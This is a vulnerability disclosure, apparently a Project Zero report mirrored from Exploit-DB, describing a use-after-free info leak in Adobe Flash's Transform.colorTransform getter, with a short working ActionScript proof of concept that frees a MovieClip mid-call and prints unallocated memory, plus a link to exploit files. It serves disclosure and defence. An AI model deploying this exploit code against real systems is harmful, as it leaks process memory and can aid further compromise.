Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=845
There is an info leak in the Transform.colorTranform getter.If the constructor for ColorTransform is overwritten with a getter using addProperty, this getter will execute when fetching the constructor, which can then free the MovieClip containing the Tranform.
A minimal PoC is as follows:
this.createEmptyMovieClip("mc", 1);var c = new ColorTransform( 77, 88, 99, 0.5, 1, 2, 3, 4);var t:Transform = new Transform( mc );
t.colorTransform = c;
this.createTextField("tf", 2, 0, 0, 2000, 200);var ct = ColorTransform;var g = flash.geom;
g.addProperty("ColorTransform", func, func);var q = t.colorTransform;
tf.text = q.greenMultiplier +"\n"+ q.blueMultiplier +"\n"+ q.color;function func(){
mc.removeMovieClip();return ct;}
A sample swf and fla are attached. The PoC prints the value of unallocated memory to the screen.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40355.zip
